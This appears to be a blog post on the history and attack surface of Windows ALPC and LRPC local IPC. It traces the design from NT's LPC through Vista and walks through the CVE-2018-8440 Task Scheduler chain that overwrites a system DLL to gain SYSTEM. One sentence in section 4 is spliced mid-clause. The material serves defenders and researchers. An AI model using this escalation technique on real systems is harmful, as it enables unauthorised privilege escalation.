Parag Mali - tag: security

Every UAC Prompt Is an ALPC Handshake: A Field Guide to Windows' Most-Attacked Local IPC Fabric

noreply@paragmali.com (Parag Mali) — Wed, 27 May 2026 00:00:00 GMT

Every Windows service that exposes a local API does so through **LRPC**, the RPC runtime's local-only transport, and LRPC rides on top of **ALPC**, the kernel's asynchronous message-and-attribute IPC primitive. The kernel layer is settled engineering. The interface-callback layer in user-mode RPC application code is the load-bearing local elevation-of-privilege surface that almost every Patch Tuesday since 2018 has shipped fixes for. Microsoft does not publish a Win32 or WDK reference for the kernel-side ALPC API; the public knowledge of both layers comes from a handful of named researchers reverse-engineering it. And per-connection ALPC ports are unnamed, which is the asymmetry that makes the threat model coherent -- Section 4 walks why.

1. Every UAC Prompt Is an ALPC Handshake

Double-click an installer. The screen dims, a familiar dialog asks whether you want to allow this app to make changes, and a moment later either nothing happens or the installer keeps running. That moment of dim-and-prompt -- the User Account Control consent dialog -- is the most-seen artefact of one of the most-attacked primitives in the Windows kernel: a four-phase handshake on an asynchronous local-IPC port whose name does not appear in any Win32 or WDK reference Microsoft publishes.

Trace the call from the user side. The Explorer shell invokes ShellExecuteEx with the verb set to runas. That call does not magically elevate the process; it sends a request to another process, the Application Information service (appinfo) running as svchost.exe -k netsvcs with SYSTEM authority [@msdocs-svchost] [@forshaw-rpc-2019]. The hand-off is an RPC call. The RPC runtime, asked for a local endpoint, selects the ncalrpc protocol sequence -- "Local procedure call" in Microsoft's own protocol-sequence reference [@msdocs-protseq]. Underneath that string is the LRPC transport in rpcrt4.dll, and underneath the LRPC transport is a kernel ALPC port that lives at the Object Manager name \RPC Control\appinfo. The kernel resolves the name, the handshake completes, and a single syscall named NtAlpcSendWaitReceivePort [@ntdoc-ntalpc] carries the request message into the SYSTEM-context server and the reply back.

That syscall is the load-bearing entry point for the entire local-IPC fabric. Microsoft Learn does not publish a reference page for it. The de facto reference is a community-maintained header dump at ntdoc.m417z.com [@ntdoc-ntalpc] that lists all eight parameters of the function. The kernel object behind the call is the _ALPC_PORT, and the per-connection structure layouts are documented only on Geoff Chappell's site [@chappell-alpc] [@chappell-alpcp] and inside the chapter named Advanced local procedure call (ALPC) of Windows Internals 7e Part 2 [@wininternals-7e].

The kernel object and syscall family that replaced classic LPC in Windows Vista (November 2006). ALPC is an asynchronous, message-and-attribute IPC primitive built around the `_ALPC_PORT` object. The user-mode entry points are the undocumented `Nt*Alpc*` and `Alpc*` functions exported from `ntdll.dll`. Every local RPC call in modern Windows transits an ALPC port [@csandker-alpc]. The Microsoft RPC runtime's transport selected when an application binds to the `ncalrpc` protocol sequence [@msdocs-protseq]. LRPC layers the RPC interface-registration model -- IDL, NDR marshalling, security callbacks -- on top of ALPC ports. LRPC is implemented inside `rpcrt4.dll`; the kernel does not know it exists. The kernel sees only ALPC messages.

The abbreviation collision is real and bites every newcomer. LPC is the original Windows NT 3.1 kernel primitive. LRPC is the RPC runtime's local transport, named in Windows NT 3.5 (1994), a full decade before ALPC existed [@custer-solomon-2e]. LRPC was a transport name when the underlying kernel object was still LPC. Vista renamed the kernel object to ALPC; nobody renamed the transport. The two abbreviations differ by one letter and refer to different layers.

Two layers sit on top of one kernel object. The kernel layer is what Nt*Alpc* syscalls touch. The user-mode layer is the RPC runtime's interface dispatch -- the IDL stubs, the NDR encoders, the per-interface security callback the application registers with RpcServerRegisterIf2 [@msdocs-rpcregisterif2]. The rest of this article pulls these two layers apart, walks the history that produced them, and explains why almost every Patch Tuesday since 2018 has shipped fixes inside the second one.

sequenceDiagram participant Client as Client (ShellExecuteEx peer) participant ConnPort as Connection port \RPC Control\appinfo participant CommPort as Per-connection communication ports (unnamed) participant Server as AppInfo service (SYSTEM) Client->>ConnPort: NtAlpcConnectPort (CONNECT) ConnPort->>Server: ALPC connect message queued Server->>CommPort: NtAlpcAcceptConnectPort (ACCEPT, returns paired handles) Client->>CommPort: NtAlpcSendWaitReceivePort (REQUEST) CommPort->>Server: ALPC message with NDR-encoded args Server->>CommPort: NtAlpcSendWaitReceivePort (REPLY) CommPort->>Client: NDR-encoded reply delivered Client->>CommPort: NtAlpcDisconnectPort (CLOSE)

The diagram is the article in miniature. Three of the four labelled actors are kernel objects: a named connection port, an unnamed pair of communication ports, and the message queue between them. The fourth is application code running in two different processes. The bugs of the next thirteen years live in the application code. The diagram's correctness rests on a structural fact almost every secondary writeup gets wrong, and Section 4 spells it out in full.

If this primitive is everywhere, why does nobody talk about it? Because nobody had to, for thirteen years.

2. Origins -- Cutler's NT and the Birth of LPC (1989-1993)

Dave Cutler talked about it, in October 1988, to a room of people he was trying to recruit out of Digital Equipment Corporation [@zachary-showstopper]. The pitch was a from-scratch portable operating system at Microsoft. The architectural commitment that mattered for our story was a microkernel-style design: the Windows personality, the OS/2 personality, the POSIX personality would all run as user-mode subsystems, each in its own process, talking to clients through a fast in-machine remote procedure call. The kernel would not implement the Win32 API directly. The kernel would implement an IPC primitive shaped like a procedure call and cheap enough to use for every Win32 API a process made.

That decision created a design problem the team had to solve before any of the subsystems could be written. Microkernel-style separation of subsystems means that the Win32 client of CreateWindow is in one process and the Win32 server that draws the window is in another. Every API call crosses a process boundary. The IPC primitive that carries the crossing has to look like a function call, return like a function call, and cost no more than tens of microseconds. The Cutler team -- Lou Perazzoli, Mark Lucovsky, Steven Wood, Darryl Havens, and the larger NT design group [@zachary-showstopper] -- shipped that primitive as Local Procedure Call, or LPC, with the first release of Windows NT in July 1993. Helen Custer documented the design that same year in Inside Windows NT [@custer-print], the canonical first-edition print primary.

The original Windows NT kernel IPC primitive, introduced with NT 3.1 in July 1993 as a synchronous inter-process communication facility [@csandker-alpc]. LPC was synchronous-call-shaped, used three port objects per connection (one named connection port plus two unnamed communication ports), and was the transport for every Win32 API call into the Client/Server Runtime Subsystem (CSRSS) until Windows Vista. The kernel removed classic LPC entirely by Windows 7; legacy `NtCreatePort` callers were silently redirected onto the ALPC implementation [@csandker-alpc].

The classic LPC mechanism worked like this. A server process calls NtCreatePort to create a connection port under an Object Manager name (for example, \Windows\ApiPort for CSRSS). The server then waits on the connection port. A client process opens the connection port by name and calls NtConnectPort to request a session. The kernel creates two new, unnamed communication ports -- one the client holds, one the server holds -- and ties them to the connection through the kernel's port-routing tables. From that point on, the client and server send messages through their respective communication-port handles; neither party has to look up the other in the Object Manager namespace. The three-port model is the architectural ancestor of every ALPC handshake the rest of this article will walk.

flowchart LR A[Client process] -- "NtConnectPort by name" --> B[Connection port \Windows\ApiPort -- NAMED] B -- "NtAcceptConnectPort" --> C[Server process] C -- "issues a pair of handles" --> D[Client comm port -- UNNAMED] C -- "issues a pair of handles" --> E[Server comm port -- UNNAMED] A -- "NtRequestWaitReplyPort" --> D D -- "kernel routes the message" --> E E -- "delivered to" --> C

The two design pinch-points that Vista would later have to fix are visible already in the 1993 mechanism. First, the call surface was synchronous: NtRequestWaitReplyPort sent a message and blocked the caller until the reply came back, which forced the higher-level RPC runtime to wrap its own asynchronous machinery around the syscall and doubled the syscall cost for every async RPC. Second, the message payload had a small fixed inline budget -- on the order of 256 bytes [@csandker-alpc] -- with anything larger requiring an explicit NtMapViewOfSection dance to set up a shared section the server would then peek into. The split between "short message in the syscall" and "long payload in a shared section" was awkward, racy, and a perennial source of off-by-one bugs in the server stubs.

The third pinch-point was security, and it is the one Cesar Cerrudo will name in 2006. LPC's access check happened once, at NtConnectPort, against the connection port's discretionary access control list (DACL). After the handshake, the kernel had no further opinion about who could send what to whom over the established channel. The server trusted every message it received because the kernel had already vouched that the client cleared the DACL at connect time. In 1993 that trust model was fine. The only callers of CSRSS were Win32 client processes the team controlled. POSIX clients talked to the POSIX subsystem; OS/2 clients talked to the OS/2 subsystem; the trust boundaries were the subsystem boundaries and nobody crossed them on purpose.

The microkernel idea -- pull as much out of the kernel as possible, run it as user-mode servers -- was a late-1980s academic enthusiasm, energised by Carnegie Mellon's Mach. Cutler brought it to NT after building VMS and the never-shipped Mica research kernel at Digital. The catch was performance. Every API call that used to be a function call inside the kernel now had to be a context switch, a message copy, and a reply, twice. If that round trip cost a millisecond, Windows would feel like a 1980s timesharing system. LPC's job was to make it cost microseconds, and the team's success there is one reason NT could ship at all. The structural cost -- a synchronous primitive whose security check ran once and then trusted the channel -- was not the 1993 team's problem, because they controlled both ends of every conversation.

The 1993 design assumed the only callers of CSRSS were Win32 client processes the team controlled. That assumption held for thirteen years.

3. The First Reckoning -- LPC's Failure Modes and Cerrudo's WLSI 2006

In March 2006, at Black Hat Europe in Amsterdam, Cesar Cerrudo gave a talk titled WLSI -- Windows Local Shellcode Injection. Twelve weeks later, Microsoft shipped the Vista ALPC redesign. The temporal compression is intentional, but it is not the whole story: the Vista redesign had been underway inside the kernel team for years before Cerrudo's talk. What the talk did was give the public security community a name and a shape for the structural class of bug the redesign was about to address.

Cerrudo's paper, archived at Exploit-DB under the title WLSI Windows Local Shellcode Injection and dated March 14, 2006 [@cerrudo-exploitdb], with the speaker deck mirrored on Black Hat's own server [@cerrudo-bh-pdf], walked an end-to-end attack on an LPC server inside CSRSS. The exact server is less important than the attack's three-clause shape, which Cerrudo articulated and which would recur, over the next two decades, in every later ALPC and LRPC privilege-escalation primitive.

flowchart LR A[Port is reachable -- the connection port DACL admits the attacker] --> D[Local elevation-of-privilege primitive] B[Server trusts the message -- no per-message identity check or per-procedure authorization] --> D C[Channel survives the access check -- LPC checks the DACL once at NtConnectPort, then forgets] --> D

Clause one: the port is reachable. The LPC connection port has a DACL; the attacker happens to be inside it. For CSRSS's \Windows\ApiPort, that means "any Win32 process on the desktop", which is exactly what NT was supposed to permit. Clause two: the DACL is permissive. Every authenticated user is in scope of the LPC servers that brokered the user-mode Win32 API surface, by design. Clause three: the server trusts the message. The LPC kernel object exposes a PORT_MESSAGE header with two fields the receiver can use for bookkeeping -- a process ID and a thread ID. The fields are not authenticated. The receiving server, in the WLSI demonstration, read attacker-controlled offsets and lengths out of the message body and walked into the server's own address space.

The three clauses together produce a local elevation primitive. None of the clauses, taken individually, is a kernel bug. None, taken individually, is even an application bug. The bug -- in the WLSI exemplar -- is that the CSRSS server trusted a length field that came from a process the server itself had no reason to trust. The OS did exactly what its security model promised. The application did exactly what the IPC primitive made easy.

A Windows access control list attached to a securable object (a file, a registry key, a kernel object such as an LPC or ALPC port) that names the security principals allowed or denied each access right. For an LPC connection port, the DACL governs whether a calling process is allowed to open the port at all. Once the port is opened, the DACL is no longer consulted for messages flowing across the established connection -- which is exactly the once-and-done check at the centre of Cerrudo's structural class. The 1993 trust model held until 2006 because the team controlled both ends of every conversation. Cerrudo named the class of bug that emerged when that assumption stopped holding.

That structural class is the load-bearing reason the Vista redesign was about to be a redesign and not a patch. The three LPC failure modes the kernel team had identified -- the ones that motivated re-architecting the primitive rather than fixing the WLSI server -- compose a near-perfect mirror of Cerrudo's three clauses. They are: (1) the synchronous-only design forced the RPC runtime to layer its own asynchronous wrapper around NtRequestWaitReplyPort, doubling the per-call syscall cost for async RPC; (2) the 256-byte inline plus shared-section dance was awkward and prone to race conditions in the server stub; (3) the port-DACL-only security model checked access once at connect and then trusted the channel, with no kernel primitive for per-message caller identity. A redesign was the only way to attack all three at once without breaking every NT 4-era server in the field.

One LPC failure mode that did not make Cerrudo's slide and that Microsoft has never publicly discussed in detail was the reply-port confusion class. In classic LPC, a server's reply traveled back over the client's communication port handle, and a misbehaving server could be tricked into replying to the wrong client when multiple connections were interleaved. Microsoft addressed this quietly in the Vista era; the only public references are footnotes in Windows Internals editions and the occasional aside in csandker [@csandker-alpc]. The public security community did not catch the bug class at the time.

In November 2006 -- eight months after WLSI -- Windows Vista shipped. The new kernel called the replacement primitive Advanced LPC. The redesign closed half of Cerrudo's structural class -- the permissive port DACL half, by giving servers fine-grained tools to control who reaches their connection ports and by introducing a per-message security attribute the server could query for caller identity. It left the other half completely intact, because the other half is not a kernel property. The other half lives in the user-mode RPC runtime and in the application code that registers RPC interfaces on top of ALPC ports. That intact half is what the next thirteen years of public security research is about.

The naive read of Cerrudo's paper is "Microsoft will fix the bug." The structural read is harder: Cerrudo did not find a bug. He named a class of bug whose root cause is a property of the trust model. The Vista redesign closed the half of the class the kernel could close. It could not close the rest, because the rest is application code, and the kernel cannot inspect application code.

4. The Breakthrough -- ALPC, the Vista Redesign, and the Message-Attribute System

The Vista kernel team's answer to Cerrudo was not a patch. It was a complete replacement of the kernel object.

ALPC re-cast the LPC port as an asynchronous, message-and-attribute-based primitive. The classic LPC quartet -- NtRequestPort, NtReplyPort, NtRequestWaitReplyPort, NtReplyWaitReplyPort -- collapsed into a single syscall, NtAlpcSendWaitReceivePort [@ntdoc-ntalpc], with eight parameters whose combinations express every variant the older quartet supported. The kernel object behind the syscall is the _ALPC_PORT. The structure layout is documented only in the chapter named Advanced local procedure call (ALPC) of Windows Internals 7e Part 2 [@wininternals-7e], in the reverse-engineered header dumps on Geoff Chappell's site [@chappell-alpc] [@chappell-alpcp], and in the community-maintained phnt headers that the Process Hacker project ships. None of those is a Microsoft Learn page.

The kernel object at the centre of Vista-and-later local IPC. Named connection ports are referenced by Object Manager name (typically under `\RPC Control`, `\BaseNamedObjects`, or per-session AppContainer subtrees). The per-connection communication ports created by `NtAlpcAcceptConnectPort` are unnamed and exist only as handles in the connecting and accepting processes. The structure layout is undocumented by Microsoft; the canonical reverse-engineered reference is Geoff Chappell's site [@chappell-alpc].

The user-mode syscall surface, enumerated as exhaustively as anyone outside Microsoft can: NtAlpcCreatePort, NtAlpcConnectPort, NtAlpcAcceptConnectPort, NtAlpcSendWaitReceivePort, NtAlpcDisconnectPort, NtAlpcCancelMessage, NtAlpcCreatePortSection, NtAlpcCreateResourceReserve, plus the PORT_ATTRIBUTES and message-attribute structures that decorate each call. Microsoft Learn does not list any of them under a Win32 or WDK developer-facing reference. NtDoc [@ntdoc-ntalpc] is the de facto syscall reference, and the Windows Internals 7e Part 2 chapter is the de facto architectural reference.

Microsoft has documented the user-mode RPC runtime exhaustively on Learn -- the IDL syntax, the marshalling rules, the binding-handle API, the interface-registration flags. The `Nt*Alpc*` and `Alpc*` kernel surface is the deliberate exception. Microsoft's framing is that ALPC is an *internal* implementation detail of the RPC runtime, not a stable developer-facing API. Application authors are supposed to write RPC code, not ALPC code. The framing is defensible -- the ALPC ABI does change between Windows versions -- but it leaves the entire defender community reverse-engineering the surface from public symbols, the *Windows Internals* book series, NtDoc, Geoff Chappell, and the open-source `phnt` headers. The Vista-and-later structural correctness story this article tells is one that Microsoft has never written down for outside readers.

The structural break with classic LPC is the message-attribute system. Every ALPC message can carry four optional attributes, each of which targets one of the awkward LPC patterns the old kernel forced server authors to roll by hand.

An optional decoration on an ALPC message that lets the sender or receiver request a kernel service in band with the message itself. The four attribute types are **Context**, **Handle**, **Security**, and **View**. Each one targets a workflow that classic LPC required application code to perform out of band; in ALPC the kernel does the work atomically with the message exchange.

The Context attribute carries a per-message per-client cookie the server uses to associate the message with a logical operation. In classic LPC, a server tracking a multi-step protocol had to maintain its own client-to-state map indexed by client process ID, with all the race conditions that map invited; the Context attribute moves that bookkeeping into the kernel and makes it correct by construction.

The Handle attribute is first-class handle passing inside the message itself. In classic LPC, transferring a kernel handle from sender to receiver required the sender to call DuplicateHandle with the receiver's process handle, hope the receiver hadn't exited, and then send the resulting handle value in the message body. The Handle attribute lets the kernel do the duplication atomically with delivery; the receiver finds the duplicated handle already in its own handle table when the message lands.

The Security attribute is the per-message identity primitive whose absence Cerrudo had named in 2006. The sender can opt to attach its caller token to a message; the receiver can opt to query the token (process ID, thread ID, integrity level, AppContainer SID) when it dispatches the message. The classic LPC pattern -- "trust the channel because the kernel checked the DACL at connect" -- gets replaced by "ask the kernel who is actually sending this message right now."

The View attribute is the shared-section dance, rewritten. In classic LPC, payloads larger than the inline budget required the sender to call NtCreateSection, both parties to call NtMapViewOfSection, and the receiver to peek into the shared mapping. The View attribute hands the receiver a section view automatically as a side effect of message delivery; no out-of-band coordination is required.

flowchart TD A[Context attribute] --> A1[Replaces: server-side client-to-state map indexed by PID] B[Handle attribute] --> B1[Replaces: out-of-band DuplicateHandle dance] C[Security attribute] --> C1[Replaces: trust the channel because DACL was checked at connect] D[View attribute] --> D1[Replaces: NtCreateSection plus NtMapViewOfSection dance for large payloads]

The handshake topology survives from classic LPC and tightens. The server creates a named connection port with NtAlpcCreatePort. The client opens the connection port by name with NtAlpcConnectPort and sends an initial connect message; the kernel queues the connect on the server's port. The server calls NtAlpcAcceptConnectPort, and the kernel returns a pair of communication-port handles -- one to the client, one to the server -- that are bound to that single connection. From that point on, the kernel routes messages through the paired handles, and every send or receive is a single call to NtAlpcSendWaitReceivePort. Asynchronous is the default; synchronous semantics are a flag combination. The per-port message queue, the blocked-receiver wake, and the cross-port routing all run inside the kernel dispatcher.

flowchart LR A[Client process] -- "NtAlpcConnectPort by name" --> B[Connection port -- NAMED in \RPC Control] B -- "kernel queues the connect" --> C[Server process] C -- "NtAlpcAcceptConnectPort" --> D[Paired comm ports -- UNNAMED] A -- "NtAlpcSendWaitReceivePort" --> D D -- "kernel routing" --> C

Here is the structural correction the input premise to this article got wrong, and that almost every secondary writeup gets wrong. Only the named connection port has an Object Manager name. The per-connection communication ports created by NtAlpcAcceptConnectPort are unnamed. They have no path under \RPC Control or \BaseNamedObjects or anywhere else. They exist only as handles in the address spaces of the two processes that completed the handshake. No third party can open them, because no third party has a name with which to ask the Object Manager for them.

Key idea: ALPC's structural correctness rests on a single move: the per-connection communication ports are unnamed. Only the parties that completed the handshake can address the channel. The kernel does not let anyone else find it. This is the half of Cerrudo's structural class the Vista redesign actually closed.

Note: A statement like "every ALPC port has an Object Manager name" is wrong, and it propagates a wrong threat model. Named ports are the entry points an attacker can knock on. Unnamed communication ports are the established channels the attacker cannot reach without first being admitted through the connection port's DACL. Defenders who get this wrong start hunting for the unnamed children in the Object Manager namespace and find nothing, then conclude the tooling is broken. The tooling is fine. The ports are not there.

Microsoft's documentation choice has consequences for tooling. The Wireshark dissector for MSRPC handles the on-the-wire NDR encoding well, but it has no view into the kernel ALPC layer because the kernel does not emit a packet capture. To see ALPC at the kernel level the tooling has to subscribe to the Microsoft-Windows-Kernel-ALPC ETW provider [@msdocs-etwsys], and even that provider is gated behind EVENT_TRACE_SYSTEM_LOGGER_MODE, which a non-SYSTEM caller cannot enable. The structural opacity of the kernel layer is partly an artefact of the deliberate "no public WDK developer-facing reference" position.

Backward compatibility was preserved by silent rewiring rather than by parallel kernel objects. The classic LPC syscall names continue to link in any pre-Vista binary, but from Windows 7 onward the kernel routes those calls into the ALPC implementation underneath [@csandker-alpc]. Classic LPC, as an independent kernel object, no longer exists. The 1993 syscall surface is alive only as a thin compatibility shim. The 2006 kernel object is what every modern Windows service actually uses.

The Vista redesign closed the permissive port DACL half of the structural problem. It left the interface callback returns RPC_S_OK when it should return RPC_S_ACCESS_DENIED half completely intact.The Vista kernel team's collective attribution stops short of naming individual ALPC architects. Windows Internals 7e Part 2 [@wininternals-7e] credits the work institutionally rather than to a single engineer, and no public Microsoft artefact identifies a single ALPC architect by name; secondary attributions in conference talks and blog posts trace back to footnotes rather than to primary record. That intact half is the rest of this article.

5. The Universalisation -- ALPC as the Local IPC Fabric (2009-2013)

By 2013, ALPC ran the local-IPC traffic of every Windows service that mattered. The kernel team had removed classic LPC. The Vista replacement had not been replaced; it had been adopted.

The transition was technically backwards-compatible. Pre-Vista binaries that called NtCreatePort and NtRequestWaitReplyPort continued to link and run; the kernel preserved the syscall names and silently rerouted the calls into the ALPC implementation underneath [@csandker-alpc]. The compatibility was not lossless -- the old single-message-per-call semantics map onto the ALPC asynchronous primitive only at the cost of an extra wait -- but it was good enough that no Microsoft-shipped service ever needed a port from classic LPC. Every service author upgrading to Vista or later was implicitly upgraded to ALPC.

By Windows 8.1 the roll-call of services riding LRPC on ALPC was effectively the roll-call of services that ship with Windows. The Client/Server Runtime Subsystem (CSRSS) had been ALPC-only since Vista. The Local Security Authority Subsystem Service (LSASS) -- which brokers logon, token issuance, and Kerberos ticket caching -- exposes its API surface over LRPC. The Service Control Manager (SCM, services.exe) accepts service-control commands over an LRPC interface. The DCOM activation service (rpcss) marshals every local COM activation request through an LRPC pipeline. Windows Error Reporting, the audio service (audiosrv), Task Scheduler (schedsvc/schrpc), the Application Information service (appinfo) that brokers UAC, the Encrypting File System extension (efslsaext, the EFSRPC server documented in the [MS-EFSR] specification [@ms-efsr]), the print spooler (spoolsv), and the Background Intelligent Transfer Service (BITS) all expose at least one LRPC interface for client communication [@csandker-rpc].

flowchart TD K[Kernel ALPC layer -- _ALPC_PORT objects, NtAlpcSendWaitReceivePort dispatcher] K --> CSRSS[CSRSS -- Win32 subsystem] K --> LSASS[LSASS -- logon and token issuance] K --> SCM[Service Control Manager] K --> RPCSS[RPCSS -- DCOM activator and epmapper] K --> APPINFO[AppInfo -- UAC consent broker] K --> SPOOL[Print Spooler] K --> SCHRPC[Task Scheduler -- schrpc and schedsvc] K --> BITS[BITS -- background transfers] K --> AUDIO[Audio service -- audiosrv] K --> EFS[EFS -- efslsaext]

That fan-out is the article's load-bearing diagram for understanding why ALPC is the most-attacked local IPC fabric in modern Windows. Every named service in that diagram is reachable over an LRPC interface. Every LRPC interface registers a per-interface security callback through RpcServerRegisterIf2 [@msdocs-rpcregisterif2] or RpcServerRegisterIf3 [@msdocs-rpcregisterif3]. Every callback is application code that the kernel cannot inspect. A single permissive interface in a single one of those services is a structural primitive that works against the transport every service uses. Trail of Bits, announcing their RPC Investigator tool in January 2023, captured the surface area in one line: MSRPC is "involved on some level in nearly every activity that you can take on a Windows system, from logging in to your laptop to opening a file" [@tob-rpcinv-blog].

MSRPC is involved on some level in nearly every activity that you can take on a Windows system, from logging in to your laptop to opening a file. -- Trail of Bits, *RPC Investigator* announcement, January 2023 [@tob-rpcinv-blog]

To see the fabric in operation, walk one call. An unprivileged user invokes StartServiceW from the SCM client library inside sechost.dll. The library binds to the SCM's local RPC endpoint -- the \RPC Control\ntsvcs ALPC port that the Service Control Manager registers at boot. The MIDL-generated client stub packs the service name and arguments into NDR and hands them to NdrClientCall3. rpcrt4.dll crosses into the kernel through NtAlpcSendWaitReceivePort. The kernel routes the ALPC message to the SCM's blocked worker thread inside services.exe. The worker, running as SYSTEM, unpacks the NDR body with NdrStubCall3 and prepares to dispatch the server-side procedure. Before the procedure runs, the RPC runtime invokes the interface security callback, which checks whether the caller's token holds SC_MANAGER_CONNECT and the target service's DACL grants SERVICE_START. If the callback returns RPC_S_OK, the SCM starts the service. The reply -- an NDR-encoded error code -- rides another NtAlpcSendWaitReceivePort back to the client. One user call, five layers crossed, and the kernel never knew it was running an RPC.

One consequence of the silent kernel rewiring is that pre-Vista NT 4-era code samples appear to work on Windows 11. A textbook example from a 1996 driver-development book that calls NtCreatePort will link, load, and exchange messages just fine; the messages are travelling over the 2006 ALPC kernel object behind a 1993 syscall name. This is unusual generosity from a kernel team that breaks driver ABIs every few releases, and it is one of the reasons Microsoft has preserved the option not to publish a Nt*Alpc* developer-facing reference: as long as everyone is supposed to use the RPC runtime, the kernel object can keep evolving.

Once the transport was universal, enumeration became valuable. If only LSASS used ALPC, listing LSASS's interfaces by hand was fine. Once every service did, automation was the only tractable methodology. The answer to who built that automation is the next section.

6. The Eureka Year -- Public Tooling and the Interface-Callback Class (2017-2019)

In an eighteen-month span between October 2017 and December 2019, four researchers turned ALPC from internal NT plumbing into the most-attacked local-IPC surface in modern Windows. The exemplars were structurally identical: an LRPC server registered an RPC interface with a callback that either was NULL or returned RPC_S_OK for a caller that should have received RPC_S_ACCESS_DENIED. The kernel ALPC layer behaved correctly in every one of them. The application code did not.

gantt title Public ALPC and LRPC research, October 2017 to December 2019 dateFormat YYYY-MM section Tooling and disclosure PacSec -- A view into ALPC-RPC plus CVE-2017-11783 :2017-10, 1M SandboxEscaper -- CVE-2018-8440 0-day on GitHub :2018-08, 1M Forshaw -- PPL and COM injection through LRPC :2018-10, 1M Ormandy -- CVE-2019-1162 MSCTF disclosure :2019-08, 1M Forshaw -- Calling local RPC servers from .NET :2019-12, 1M

The first publication is Clement Rouault and Thomas Imbert's "A view into ALPC-RPC", presented at PacSec in November 2017 [@hakril-pacsec] [@slideshare-pacsec] and at Hack.lu the same season [@youtube-hacklu]. The talk is the first end-to-end mechanical walk of the LRPC-over-ALPC stack to appear at a public security conference, and the talk's deliverable was a working NDR-aware fuzzer named RPCForge [@rpcforge]. RPCForge surfaced CVE-2017-11783 [@nvd-cve-2017-11783], the first publicly-acknowledged ALPC elevation-of-privilege issue surfaced by an outside-Microsoft fuzzer. The NVD entry phrases the bug class as "the way it handles calls to Advanced Local Procedure Call (ALPC)" -- the canonical "ALPC EoP" classification that NVD reuses for every later instance.

The second is James Forshaw's NtObjectManager tooling, distributed through the sandbox-attacksurface-analysis-tools repository at Google Project Zero [@forshaw-saatools]. The tooling is a PowerShell module backed by a .NET library originally called NtApiDotNet and renamed to NtCoreLib in 2024. Forshaw introduced the design intent in a December 17, 2019 Project Zero post titled Calling Local Windows RPC Servers from .NET [@forshaw-rpc-2019], opening with what amounts to a personal manifesto: "As much as I enjoy finding security vulnerabilities in Windows, in many ways I prefer the challenge of writing the tools to make it easier for me and others to do the hunting." The post named a gap in his own methodology -- "one of my big blind spots was anything which directly interacted with a Local RPC server" -- and introduced Get-RpcServer, Get-NtAlpcServer, and New-RpcClient as the cmdlets that closed it.

As much as I enjoy finding security vulnerabilities in Windows, in many ways I prefer the challenge of writing the tools to make it easier for me and others to do the hunting. -- James Forshaw, *Calling Local Windows RPC Servers from .NET*, Project Zero, December 17, 2019 [@forshaw-rpc-2019]

The conceptual workflow Forshaw's tooling enables is short enough to fit on one screen. Enumerate every DLL on the system that contains RPC interface metadata. Parse the metadata to recover the IDL-equivalent description of each interface -- the UUID, the version, the procedures, the parameter types. Filter to the ones bound to a local-only protocol sequence. The result is an inventory of "every local RPC procedure callable on this Windows install." Diff the inventory across a Patch Tuesday and the changes -- new procedures, retired procedures, changed security descriptors -- become a research backlog.

{` // PowerShell equivalent (run inside an elevated session with NtObjectManager installed): // Install-Module NtObjectManager // Get-RpcServer -DbgHelpPath 'C:\\Program Files\\Debugging Tools for Windows\\dbghelp.dll' | // Where-Object { $.Endpoints.ProtocolSequence -eq 'ncalrpc' } | // Select-Object Name, InterfaceId, @{N='ProcCount';E={$.Procedures.Count}}

// The runnable below mirrors the same logic in plain JS so the in-browser engine can execute it. const interfaces = [ { name: 'AppInfo', interfaceId: '201ef99a-7fa0-444c-9399-19ba84f12a1a', protocolSequence: 'ncalrpc', procedures: 12 }, { name: 'schrpc', interfaceId: '86d35949-83c9-4044-b424-db363231fd0c', protocolSequence: 'ncalrpc', procedures: 27 }, { name: 'spoolss', interfaceId: '12345678-1234-abcd-ef00-0123456789ab', protocolSequence: 'ncacn_np', procedures: 96 }, { name: 'lsarpc-local', interfaceId: '12345778-1234-abcd-ef00-0123456789ab', protocolSequence: 'ncalrpc', procedures: 81 }, { name: 'epmapper', interfaceId: 'e1af8308-5d1f-11c9-91a4-08002b14a0fa', protocolSequence: 'ncalrpc', procedures: 5 }, ];

const local = interfaces .filter(i => i.protocolSequence === 'ncalrpc') .map(i => ({ name: i.name, interfaceId: i.interfaceId, procCount: i.procedures }));

console.log('Local RPC interfaces (ncalrpc only):'); local.forEach(i => console.log(` ${i.name.padEnd(16)} ${i.interfaceId} procs=${i.procCount}`)); console.log(`Total: ${local.length}`); `}

The third publication is SandboxEscaper's CVE-2018-8440 [@nvd-cve-2018-8440], dropped as a 0-day on GitHub on August 27, 2018, and triaged by CERT/CC as VU#906424 on August 28 with the note that the vulnerability was "being exploited in the wild" [@cert-vu906424]. The 0patch team published a micropatch within days and walked the bug specifics [@0patch-micropatch]. The structural shape of the bug is canonical and is worth tracing carefully.

sequenceDiagram participant Att as Unprivileged attacker process participant Sch as Task Scheduler ALPC port \RPC Control\atsvc participant Srv as schedsvc.dll worker thread (SYSTEM) participant FS as Target file -- C:\WINDOWS\System32\example.dll Att->>Sch: NtAlpcConnectPort plus LRPC SchRpcSetSecurity request Sch->>Srv: dispatch -- IfCallbackFn is NULL, no security callback runs Srv->>FS: SetSecurityInfo as SYSTEM, grant Everyone:F to attacker-chosen path Srv->>Att: RPC_S_OK Att->>FS: overwrite the now-writable file Note over Att,FS: next call into the modified binary executes attacker code as SYSTEM

The Task Scheduler service exposes an LRPC interface containing a procedure named SchRpcSetSecurity, registered through RpcServerRegisterIf2 with IfCallbackFn set to NULL. NULL has a specific meaning, documented verbatim on Microsoft Learn: "IfCallbackFn: Security-callback function, or NULL for no callback" [@msdocs-rpcregisterif2]. No callback means the RPC runtime dispatches the call without asking the application whether the caller should be allowed.

Once dispatched, SchRpcSetSecurity running in the SYSTEM-context Task Scheduler worker thread set a permissive DACL on a file the attacker specified. The attacker chose a file the attacker did not have write access to. The SYSTEM-context service made it writable. The attacker then wrote attacker-controlled bytes into the file, triggered execution, and inherited SYSTEM.

The 0patch micropatch writeup named the structural pattern as "the Task Scheduler fails to impersonate the requesting client" [@0patch-micropatch] -- which is to say, the service did the operation in its own privileged identity instead of the caller's. CERT/CC framed the same bug in transport terms: a vulnerability "in the handling of ALPC" that lets an authenticated user overwrite an arbitrary file [@cert-vu906424].

Note: A NULL IfCallbackFn is the canonical elevation-of-privilege-by-default bug shape. Microsoft Learn documents it as a legal value [@msdocs-rpcregisterif2], and the runtime accepts it without warning. Every notable LRPC EoP since 2017 either left the callback NULL or registered a callback whose body said the wrong thing. Defenders auditing in-house LRPC services should treat any RpcServerRegisterIf2(..., NULL) in production code as a finding.

